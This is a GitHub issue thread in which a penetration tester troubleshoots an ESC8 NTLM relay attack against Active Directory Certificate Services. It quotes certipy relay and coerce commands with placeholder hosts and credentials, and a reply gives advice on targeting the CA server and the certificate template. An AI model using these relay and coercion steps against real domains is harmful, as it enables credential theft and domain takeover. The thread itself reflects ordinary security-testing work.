You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
On a test I've found a config reporting vulnerable to ESC8. I setup certipy relay -target vulnca.domain.com when I try to coerce from a DC with coerce -u user -p pass -t ip.of.a.dc -l my.attacking.kali.ip my smb.log is filled with entries like:
Received connection from DOMAIN/DC$ at DC01$, connection will be relayed after re-authentication
Any ideas of what's going on here? Not sure what to try next.
The text was updated successfully, but these errors were encountered:
In ESC8 you should be relaying to the ADCS CA server, not DC. Remember to define the affected template. It should work with hostname instead of IP, but try both if one does not work.
OK I got things reconfigured and the relay is happening but not successful. I got a second opinion through ntlmrelayx and I'm getting "No NTLM challenge returned from server" so I'm thinking they've hardened the config?
Hello!
On a test I've found a config reporting vulnerable to ESC8. I setup
certipy relay -target vulnca.domain.com
when I try to coerce from a DC withcoerce -u user -p pass -t ip.of.a.dc -l my.attacking.kali.ip
my smb.log is filled with entries like:Any ideas of what's going on here? Not sure what to try next.
The text was updated successfully, but these errors were encountered: